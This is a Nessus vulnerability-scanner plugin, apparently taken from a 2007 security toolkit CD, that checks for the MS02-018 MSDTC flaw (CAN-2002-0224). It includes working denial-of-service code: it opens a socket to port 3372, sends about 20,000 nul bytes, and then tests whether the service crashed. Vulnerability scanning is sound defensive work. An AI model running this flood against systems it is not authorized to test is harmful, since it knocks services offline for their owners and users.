home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / msdtc_dos.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  72 lines

  1. #
  2. # Crashes MSDTC
  3. #
  4. # by Michel Arboi <arboi@alussinan.org>
  5. #
  6. # See the Nessus Script License for details
  7.  
  8. if(description)
  9. {
  10.  script_id(10939);
  11.  script_bugtraq_id(4006);
  12.  script_version ("$Revision: 1.9 $");
  13.  script_cve_id("CAN-2002-0224");
  14.  name["english"] = "MSDTC denial of service by flooding with nul bytes";
  15.  script_name(english:name["english"]);
  16.  
  17.  desc["english"] = "
  18. It was possible to crash the MSDTC service by sending
  19. 20200 nul bytes.
  20.  
  21. Solution : Read the MS02-018 bulletin
  22. http://www.microsoft.com/technet/security/bulletin/ms02-018.mspx
  23.  
  24. Risk factor : High";
  25.  
  26.  
  27.  desc["francais"] = "
  28.  Il s'est avΘrΘ possible de tuer le service MSDTC
  29. en lui envoyant 20200 octets nuls.
  30.  
  31. Solution : Lisez le bulletin MS02-018
  32. http://www.microsoft.com/technet/security/bulletin/ms02-018.mspx
  33.  
  34. Facteur de risque : SΘrieux";
  35.  
  36.  
  37.  script_description(english:desc["english"], francais:desc["francais"]);
  38.  
  39.  summary["english"] = "crash the MSDTC service";
  40.  summary["francais"] = "tue le service MSDTC";
  41.  
  42.  script_summary(english:summary["english"], francais:summary["francais"]);
  43.  
  44.  script_category(ACT_DENIAL);
  45.  
  46.  
  47.  script_copyright(english:"This script is Copyright (C) 2002  Michel Arboi",
  48.         francais:"Ce script est Copyright (C) 2002 Michel Arboi");
  49.  script_family(english:"Denial of Service");
  50.  script_dependencie("find_service.nes");
  51.  script_require_ports("Services/msdtc", 3372);
  52.  exit(0);
  53. }
  54.  
  55.  
  56. #
  57. # Here we go
  58. #
  59. port = get_kb_item("Services/msdtc");
  60. if(!port)port = 3372;
  61. if(!get_port_state(port))exit(0);
  62. soc = open_sock_tcp(port);
  63. if(!soc)exit(0);
  64. # 20020 = 20*1001
  65. zer = raw_string(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0);
  66. send(socket:soc, data:zer) x 1001;
  67. close(soc);
  68. sleep(2);
  69.  
  70. soc2 = open_sock_tcp(port);
  71. if(!soc2)security_hole(port);
  72.